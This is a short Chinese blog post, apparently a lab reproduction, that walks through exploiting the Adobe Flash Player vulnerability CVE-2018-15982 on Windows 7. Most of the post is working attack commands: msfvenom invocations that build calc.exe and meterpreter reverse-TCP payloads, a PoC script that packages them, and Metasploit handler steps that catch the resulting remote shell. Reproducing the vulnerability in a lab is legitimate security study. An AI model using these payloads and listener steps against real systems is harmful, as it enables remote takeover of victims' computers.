CVE-2018-15982FlashPlayer漏洞复现

发布于 2019-12-17  832 次阅读


0x01 受影响版本

  • Adobe Flash Player <= 31.0.0.153
  • Adobe Flash Player Installer<= 31.0.0.108

0x02 实验环境

  • Windows7 x64 SP1+Adobe Flash Player 31.0.0.153
  • Kali + CVE-2018-15982.py

POC下载地址

0x03 使用命令

#生成弹计算器Payload
msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin
msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin
python CVE-2018-15982.py -i 86.bin -I 64.bin
#生成meterpreter反弹shell Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.132 LPORT=4444 -f raw > 86.bin
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.26.132 LPORT=4444 -f raw > 64.bin
python CVE-2018-15982.py -i 86.bin -I 64.bin 
#开启监听
msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set lhost 192.168.26.132
msf exploit(handler) > set lport 4444 //默认端口4444,这一步可以省去
msf exploit(handler) > run

0x04 视频演示


我不懂世界到底在热闹些什么